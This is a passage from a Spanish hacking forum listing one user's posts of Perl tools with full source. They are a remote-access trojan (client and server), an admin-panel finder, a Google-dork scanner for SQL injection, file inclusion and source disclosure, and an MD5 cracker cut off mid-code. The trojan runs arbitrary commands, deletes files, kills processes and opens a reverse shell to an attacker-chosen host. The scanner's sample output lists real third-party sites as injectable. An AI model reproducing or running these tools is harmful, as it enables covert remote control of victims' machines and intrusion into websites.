Últimos Temas de: BigBear

Mostrar Temas
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42 43

381

Programación / Scripting / [Perl] Troyano Nefaster

en: 9 Octubre 2011, 17:47 pm

Bueno es es mi troyano Nefaster , en esta version le arregle varias cosas que pasare a detallar

Mostrar Informacion
Navegador de archivos
Cambiar directorio de navegacion
Crear archivo
Borrar archivo
Borrar directorio
Reproducir musica o videos poniendo la ruta en la opcion
Parar reproduccion
Abrir lectora de CD
Cerrar lectora de CD
Puertos abiertos
Mensaje
Ejecutar comandos
Esconder barra de tareas
Devolver barra de tareas
Esconder iconos del escritorio
Devolver iconos del escritorio
Administrar procesos con posibilidad de cerrar el que quieran
Reverse Shell si es que quieren ejecutar comandos de forma mas comoda

El codigo del cliente es este

Código

#!usr/bin/perl
#Nefester (Cliente) 0.1 By Doddy H
 
 
use IO::Socket;
use Cwd;
 
&menu;
 
sub head {
 
system 'cls';
 
print q(
 
 
            E      F                   TT    E        
NNNNNNNEEEEEE FFFFFF   AAA   SSSSSTTTTTTEEEEEE RRRRRR 
 NN NN  E EE   FFFF   A AA  S  S T TT T  E EE   RRRRR 
 NNNNN  E EE   FF F   AAAAA S     T TT   E EE   RR  R 
 NNNNN EEEEE  FFFFF  AAA AA  SSS S  TT  EEEEE  RRRRR  
 NNNNN  E EEE  FFF    AAAAA S  SSS  TT   E EEE  RR R  
 NN NN  EEEE E FF    AAA AA SS  SS  TT   EEEE E RR  R 
NNN NN EEEEEEEFFFF  AAA  AAA  SSS  TTTT EEEEEEE RRR RR
                            SS                 R   R  
 
 
 
);
 
}
 
sub menu {
 
&head;
 
print "[Target] : ";
chomp(my $ip = <STDIN>);
 
 
 
my $socket = new IO::Socket::INET( 
PeerAddr => $ip,
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);
 
if ($socket) {
$socket->close;
&menuo($ip);
} else {
print "\n\n[-] Target no infectado\n";
<STDIN>;
&menu; 
}
 
}
 
sub menuo {
 
&head;
 
print "[$_[0]] : Servidor Activado\n\n";
print q(
1 : Informacion
2 : Navegador
3 : Abrir CD
4 : Cerrar CD
5 : Puertos abiertos
6 : Mensaje
7 : CMD
8 : Esconder barra de tareas
9 : Devolver barra de tareas
10 : Esconder iconos
11 : Devolver iconos
12 : Administrar procesos
13 : Reverse Shell
14 : Cambiar IP
15 : Salir
 
 
);
print "[Opcion] : ";
chomp(my $opcion = <STDIN>);
 
 
if ($opcion eq 1) {
print "\n\n[+] Informacion\n\n";
$re = daryrecibir($_[0],"infor");
if ($re=~/:(.*):(.*):(.*):(.*):(.*):/) {
print "[Dominio] : $1\n";
print "[Chip] : $2\n";	
print "[Version] : $3\n";	
print "[Nombre] : $4\n";	
print "[OS] : $5\n";
<stdin>;
} 
&menuo($_[0]);
} 
elsif ($opcion eq 2) {
 
menu1:
print "\n\n[+] Navegacion de archivos\n\n";
$cwd = daryrecibir($_[0],"getcwd"."\r\n");
print "tengo $cwd\n";
show($_[0],"/");
&menu2;
 
sub menu2 {
print "\n\n[Opciones]\n\n";
print "1 - Cambiar directorio\n";
print "2 - Crear archivo\n";
print "3 - Borrar archivo\n";
print "4 - Borrar directorio\n";
print "5 - Reproducir musica\n";
print "6 - Parar reproduccion\n";
print "7 - Volver al menu inicial\n\n";
print "[Opcion] : ";
chomp(my $op = <stdin>);
 
if ($op eq 1) {
print "\n\n[+] Directorio : ";
chomp (my $dir=<stdin>);
$ver = daryrecibir($_[0],"chdirnow K0BRA".$dir."K0BRA");
if ($ver=~/ok/ig) {
print "\n\n[+] Directory changed\n\n";
}
show($_[0],$dir);
&menu2;
<stdin>;
}
 
elsif ($op eq 2) {
 
print "\n\n[Nombre] : ";
chomp(my $name = <stdin>);
print "\n\n[Contenido] : ";
chomp(my $code = <stdin>);
 
daryrecibir($_[0],"crearnow K0BRA".$name."K0BRA ACATOY".$code."ACATOY");
 
print "\n\n[+] Archivo creado \n\n";
<stdin>;
}
elsif ($op eq 3) {
print "\n\n[Archivo a borrar] : ";
chomp(my $file = <stdin>);
$re = daryrecibir($_[0],"borrarfile K0BRA".$file."K0BRA");
if ($re=~/ok/) {
print "\n\n[+] Archivo Borrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
}
 
elsif ($op eq 4) {
print "\n\n[Directorio a borrar] : ";
chomp(my $file = <stdin>);
$re = daryrecibir($_[0],"borrardir K0BRA".$file."K0BRA");
if ($re=~/ok/) {
print "\n\n[+] Directorio Borrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
}
 
elsif ($op eq 5) {
print "\n\n[Archivo] : ";
chomp(my $file = <stdin>);
print "\n\n[+] Reproduciendo\n\n";
daryrecibir($_[0],"playmusic K0BRA".$file."K0BRA");
<stdin>;
}
elsif ($op eq 6) {
print "\n\n[+] Reproduccion detenida\n\n";
daryrecibir($_[0],"pararmusic");
<stdin>;
}
elsif ($op eq 7) {
&menuo($_[0]);
}
else {
show($_[0],"/");
}
goto menu1;
}
}
 
elsif ($opcion eq 3) {
daryrecibir($_[0],"opencd");
&menuo($_[0]);
}
 
elsif ($opcion eq 4) {
daryrecibir($_[0],"closedcd");
&menuo($_[0]);
}
 
elsif ($opcion eq 5) {
print "\n[Puertos Abiertos]\n\n";
$re = daryrecibir($_[0],"porters");
while ($re=~/:(.*?):/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}
<stdin>;
&menuo($_[0]);
}
elsif ($opcion eq 6) {
print "\n[Mensaje] : ";
chomp (my $msg = <stdin>);
daryrecibir($_[0],"msgbox $msg");
<stdin>;
&menuo($_[0]);
} 
elsif ($opcion eq 7) {
 
menu:
 
my $cmd,$re;
 
print "\n\n>";
 
chomp(my $cmd= <stdin>);
 
if ($cmd=~/exit/ig) {
&menuo($_[0]);
}
 
$re = daryrecibir($_[0],"comando :$cmd:");
print "\n".$re;
goto menu;
&menuo($_[0]);
}
elsif ($opcion eq 8) {
daryrecibir($_[0],"iniciochau");
&menuo($_[0]);
}
elsif ($opcion eq 9) {
daryrecibir($_[0],"iniciovuelve");
&menuo($_[0]);
}
elsif ($opcion eq 10) {
daryrecibir($_[0],"iconochau");
&menuo($_[0]);
}
elsif ($opcion eq 11) {
daryrecibir($_[0],"iconovuelve");
&menuo($_[0]);
}
 
elsif ($opcion eq 12) {
 
&reload($_[0]);
 
sub reload {
 
my @pro;
my @pids;
 
my $sockex = new IO::Socket::INET( 
PeerAddr => $_[0],
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);
 
print $sockex "mostrarpro"."\r\n";
$sockex->read($re,5000);
$sockex->close;
 
chomp $re;
 
print "\n\n[+] Procesos encontrados\n\n";
 
while ($re=~/PROXEC(.*?)PROXEC/ig) {
if ($1 ne "") {
push(@pro,$1);
}
}
 
while ($re=~/PIDX(.*?)PIDX/ig) {
if ($1 ne "") {
push(@pids,$1);
}
}
 
$cantidad = int(@pro);
 
for my $num(1..$cantidad) {
if ($pro[$num] ne "") {
print "\n[+] Proceso : ".$pro[$num]."\n";
print "[+] PIDS : ".$pids[$num]."\n"; 
}
}
 
print q(
 
[Opciones]
 
 
1 - Refrescar lista
2 - Cerrar procesos
3 - Volver al menu
 
);
 
print "\n[Opcion] :  ";
chomp(my $opc = <stdin>);
 
if ($opc=~/1/ig) {
&reload($_[0]);
}
elsif($opc=~/2/ig) {
print "\n[+] Write the name of the process : ";
chomp(my $numb = <stdin>);
print "\n[+] Write the PID of the process : ";
chomp(my $pid = <stdin>);
$re = daryrecibir($_[0],"chauproce K0BRA".$pid."K0BRA".$numb."K0BRA");
if ($re=~/ok/ig) {
print "\n\n[+] Proceso cerrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
&reload($_[0]);
}
elsif($opc=~/3/ig) {
&menuo($_[0]);
}
else {
&reload;
}
}
}
 
elsif ($opcion eq 13) {
print "\n\n[IP] : ";
chomp(my $ip = <stdin>);
print "\n\n[Port] : ";
chomp(my $port = <stdin>);
print "\n\n[+] Connected !!!\n\n";
$re = daryrecibir($_[0],"backshell :$ip:$port:");
}
elsif ($opcion eq 14) {
&menu;
}
elsif ($opcion eq 15) {
exit 1;
}	
else {
&menuo;
}
}
 
sub daryrecibir {
 
my $sockex = new IO::Socket::INET( 
PeerAddr => $_[0],
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);
 
print $sockex $_[1]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r";
}
 
sub show {
 
my $re = daryrecibir($_[0],"getcwd"."\r\n");
print "\n\n[+] Directorio Actual : $re\n\n";
$re1 = daryrecibir($_[0],"dirnow ACATOY".$re."ACATOY"."\r\n");
print "\n\n[Directorios]\n\n";
 
while ($re1=~/DIREX(.*?)DIREX/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}
 
print "\n\n[Archivos]\n\n";
 
while ($re1=~/FILEX(.*?)FILEX/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}
 
}
 
#
# ¿ The End ? 
#

Y el server

Código

#!/usr/bin/perl
#Nefester (sERVidor) 0.1 By Doddy H
#Compilar con perl2exe para sacar consola
 
use IO::Socket;
use Socket;
use Win32;
use Cwd;
use Win32::MediaPlayer;
use Win32::Process::List;
use Win32::Process;
use Win32::API;
 
use constant SW_HIDE => 0;
use constant SW_SHOWNORMAL => 1;
 
my $a = new Win32::API('user32', 'FindWindow', 'PP', 'N');
my $b = new Win32::API('user32', 'ShowWindow', 'NN', 'N');
 
$test = new Win32::MediaPlayer;
 
my $sock = IO::Socket::INET->new(LocalPort => 666,
Listen => 10,
Proto => 'tcp',
Reuse => 1); 
 
print "online\n";
 
while (my $con = $sock->accept){
$resultado = <$con>;
print "boludo mando : $resultado\n";
 
if ($resultado=~/msgbox (.*)/ig) {
Win32::MsgBox($1,0,"Mensaje de Dios") 
}
 
if ($resultado=~/backshell :(.*):(.*):/ig) {
 
my ($ip,$port) = ($1,$2);
 
print "conectando $ip con $port\n";
 
$ip =~s/(\s)+$//;
$port =~s/(\s)+$//;
 
conectar($ip,$port);
tipo();
 
sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}
 
sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("export TERM=xterm;exec sh -i");
}
}
 
sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}
 
sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}
 
 
}
 
if ($resultado =~/opencd/ig) {
 
use Win32::API;
 
my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
my $rta = ' ' x 127;  
$ventana->Call('set CDAudio door open', $rta, 127, 0);
print $con "ok"."\r\n";	
}
 
if ($resultado=~/chauproce K0BRA(.*)K0BRA(.*)K0BRA/ig) {
 
my ($pid,$numb) = ($1,$2);
 
$pid=~s/(\s)+$//;
$numb=~s/(\s)+$//;
 
if (Win32::Process::KillProcess($pid,$numb)) {
print $con "ok\r\n";
}
}
 
if ($resultado =~/closedcd/ig) {
 
use Win32::API;
 
my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
my $rta = ' ' x 127;  
$ventana->Call('set CDAudio door closed', $rta, 127, 0);
print $con "ok"."\r\n";	
}
 
if ($resultado=~/borrarfile K0BRA(.*)K0BRA/ig) {
 
my $filex = $1;
 
$filex =~s/(\s)+$//;
 
print getcwd()."/".$filex."\n\n";
 
if (unlink(getcwd()."/".$filex)) {
print $con "ok\r\n"; 
}
 
}
 
 
 
if ($resultado=~/infor/ig) {
print "mando";	
use Win32;
 
 
my $domain = Win32::DomainName();
my $chip = Win32::GetChipName();
my $version = Win32::GetOSVersion();
my $nombre = Win32::LoginName();
my  $os = Win32::GetOSName();
 
print $con ":".$domain.":".$chip.":".$version.":".$nombre.":".$os.":"."\r\n";
}
 
 
if ($resultado=~/porters/ig) {
 
use Net::Netstat::Wrapper;
 
$por = "";
@ports = Net::Netstat::Wrapper->only_port();
for(@ports) {
$por = $por.":".$_;
}
print $con $por."\r\n";
}
 
 
if ($resultado=~/playmusic K0BRA(.*)K0BRA/ig) {
 
my $cancion = $1;
 
$cancion =~s/(\s)+$//;
 
$test->load($cancion);
$test->play;	
 
}
 
if ($resultado=~/chdirnow K0BRA(.*)K0BRA/ig) {
 
my $dir = $1;
$dir =~s/(\s)+$//;
 
 
if (chdir($dir)) {
print $con "ok\r\n"; 
} 
 
}
 
if ($resultado=~/borrardir K0BRA(.*)K0BRA/ig) {
 
my $veox = $1;
$veox =~s/(\s)+$//;
 
if (rmdir(getcwd()."/".$veox)) {
print $con "ok\r\n"; 
}
}
 
 
 
if ($resultado=~/pararmusic/ig) {
$test->close;
}
 
 
 
if ($resultado=~/dirnow ACATOY(.*)/ig) {
 
my $real = $1;
chomp $real;
 
$real =~s/(\s)+$//;
 
print "real $real\n\n";
 
my @archivos = coleccionar($real);
 
for (@archivos) {
print $_."\n";
my $todo = $real."/".$_;
 
print $todo."\n";
 
if (-f $todo) {
print $con "FILEX".$_."FILEX"."\r\n";
print "File : ".$_."\n";
}
 
if (-d $todo) {
print $con "DIREX".$_."DIREX"."\r\n";
print "Dir : ".$_."\n";
}
 
}
}
 
sub coleccionar {
opendir DIR,$_[0];
my @archivos = readdir DIR;
close DIR;
return @archivos;
}
 
if ($resultado=~/getcwd/ig) {
print "envie ".getcwd()."\n\n";
print $con getcwd()."\r\n";
}
 
 
if ($resultado=~/mostrarpro/ig) {
 
 
my $new = Win32::Process::List->new();  
my %process = $new->GetProcesses();
for my $pid (keys %process) {
print $con "PROXEC".$process{$pid}."PROXEC\r\n";
print $con "PIDX".$pid."PIDX\r\n";
 
}
 
 
}
 
if ($resultado=~/crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY/ig) {
my $name = $1;
my $file = $2;
 
chomp $name;
chomp $file;
 
$name =~s/(\s)+$//;
$file =~s/(\s)+$//;
 
print "name is $name end\n";
print "file is $file end\n";
 
open FILE,">>".$name;
print FILE $file."\n";
close FILE;
}
 
if ($resultado=~/comando :(.*):/ig) {
print "llego comando $1\n";
print $resultado;
my $temp = qx($1);
print $con $temp."\r";
}
 
if ($resultado=~/iniciochau/g) {
inicio_chau("Shell_TrayWnd");
} 
if ($resultado=~/iniciovuelve/g) {
inicio_vuelve("Shell_TrayWnd");
} else {
print $resultado;
}
if ($resultado=~/iconovuelve/g) {
icono_vuelve("Program Manager");
}
if ($resultado=~/iconochau/g) {
icono_chau("Program Manager");
}
 
 
sub icono_vuelve {
$handle = $a->Call(0,$_[0]);
$b->Call($handle,SW_SHOWNORMAL);
 
}
 
sub icono_chau {
 
$handle = $a->Call(0,$_[0]);
$b->Call($handle,SW_HIDE);
 
}
 
sub inicio_vuelve {
$handlex = $a->Call($_[0],0);
$b->Call($handlex,SW_SHOWNORMAL);
 
}
 
sub inicio_chau {
 
$handlea = $a->Call($_[0],0);
$b->Call($handlea,SW_HIDE);
 
}
 
 
}
 
 
# ¿ The End ?

382

Programación / Scripting / [Perl] Panel Control 0.6

en: 8 Octubre 2011, 16:57 pm

La nueva version de esta herramienta para buscar el panel de administracion

Código

#!usr/bin/perl
#Panel Control 0.6
#(C) Doddy Hackman 2011
 
use LWP::UserAgent;
 
@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <web>\n\n";
} else {
scan($ARGV[0]);
}
copyright();
 
sub scan {
print "\n[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = toma($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
}
}
}
 
sub head {
print "\n\n-- == Panel Control == --\n\n";
}
 
sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}
 
sub toma {
return $nave->get($_[0]);
}
 
#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

383

Programación / Scripting / [Perl] Paranoic Scan By Doddy H

en: 8 Octubre 2011, 16:56 pm

Hola.

Hoy traigo un programa que eh estado haciendo porque estaba harto de ir probando cada
web que encontraba en google para saber si tenia la vulnerabilidad que queria
Asi que por eso hice esta tool , con las siguientes opciones

* Permite scaner un archivo con webs
* Permite buscar en google , borrar repes , y luego scanear

Tipos de scan :

* SQL
* LFI
* RFI
* FULL SOURCE DISCLOURE

Ejemplo de uso

Código:




@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
 @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
 @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
 @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
 @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
 @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




[a] : Scan a File
[b] : Search in google and scan the webs

[option] : b

[+] Dork : ficha.php+id
[+] Pages : 200


[+] Scan Type :

[S] : SQL
[L] : LFI
[R] : RFI
[F] : Full Source Discloure
[A] : All


[Option] : s

[Google] : www.google.com.ar
[Dork] : ficha.php+id
[Pages] : 200

[+] Searching pages..
[+] Cleaning results

[Status] : Scanning
[Webs Count] : 136

[+] SQLI : http://www.3tres3.com/opinion/ficha.php?id=
[+] SQLI : http://www.vincipark.es/ficha.php?id=
[+] SQLI : http://www.maxhuber.cl/ficha.php?id=
[+] SQLI : http://www.alddeaviviendas.com/sitio/ficha.php?id=
[+] SQLI : http://www.bvocal.org/ficha.php?id=
[+] SQLI : http://www.animadas.com/artista-ficha.php?id=
[+] SQLI : http://www.madamedepompadour.cl/ficha.php?id=
[+] SQLI : http://codigo-civil.org/base/ficha.php?id=
[+] SQLI : http://www.cibercolchon.com/ficha.php?id=
[+] SQLI : http://www.100citiesinitiative.org/ficha.php?ID=
[+] SQLI : http://www.nibbledpencil.com/ficha.php?id=

[Status] : Finish



(C) Doddy Hackman 2010

Codigo

Código

 
#!usr/bin/perl
#Paranoic Scan 0.4
#(c)0ded by Doddy H 2010
 
use LWP::UserAgent;
use HTTP::Request::Common;
use URI::Split qw(uri_split);
 
my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
 
 
 
 
 
sub head {
system 'cls';
print qq(
 
 
@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
 @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @ 
 @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @ 
 @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @ 
 @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @ 
 @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@ 
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @ 
 
 
 
 
);
}
&menu;
sub menu {
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
if ($op=~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
@paginas = repes(savewords($word));
my $option = &men;
scan($option,@paginas);
} 
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
@paginas = &google("www.google.com.ar",$dork,$pag);
scan($option,@paginas);
}
else {
&menu;
}
}
sub scan {
my ($option,@webs) = @_;
print "\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
&sql($_);
} 
if ($option=~/L/ig) {
&lfi($_);
}
if ($option=~/R/ig) {
&rfi($_);
}
if ($option=~/F/ig) {
&fsd($_);
}
if ($option=~/A/ig) {
&sql($_);
&lfi($_);
&rfi($_);
&fsd($_)
}
}
}
print "\n[Status] : Finish\n";
&finish;
 
 
sub toma {
return $nave->request (GET $_[0])->content;
}
 
 
sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}
 
sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}
 
 
sub google {
print "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n";
for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
$response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
while ($response=~m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
push(@founds,$1);
}}
print "[+] Cleaning results\n";
for(@founds) {
$t = clean($_);
push(@r,$t);
} 	
return(repes(@r));
}
 
 
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}
 
sub rfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}
 
sub lfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}
 
 
sub fsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) { 
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}
 
sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}
 
sub savewords {
open (FILE,$_[0]);
@words = <FILE>;
close FILE;
for(@words) {
$t = clean($_);
push(@r,$t);
} 	
return(@r);
} 
 
sub men {
print "\n\n[+] Scan Type : \n\n";
print "[S] : SQL\n";
print "[L] : LFI\n";
print "[R] : RFI\n";
print "[F] : Full Source Discloure\n";
print "[A] : All\n\n";
print "\n[Option] : ";
chomp(my $option = <STDIN>);
return $option;
}
 
sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}
 
#The End
#Contact : doddy-hackman[at]hotmail[com]
#blog : doddy-hackman.blogspot.com

384

Programación / Scripting / [Perl] Pass Cracker By Doddy H

en: 8 Octubre 2011, 16:56 pm

Hola , aca les dejo un simple programa para buscar la decodificacion de un hash md5

Código

#!usr/bin/perl
#Pass Cracker 1.0 
#(C) Doddy Hackman 2011
 
use LWP::UserAgent;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <hash>\n\n";
} else {
crackit($ARGV[0]);
}
copyright();
 
sub crackit {
 
print "\n[+] Cracking $_[0]\n\n";
 
my %hash = (
 
'http://passcracking.com/' => {
'tipo'  => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},   
'http://md5.hashcracking.com/search.php?md5=' =>  { 
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' =>  { 
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' =>  { 
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' =>  { 
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' =>  { 
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
}
);
 
for my $data(keys %hash) {
 
if ($hash{$data}{tipo} eq "get") {
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
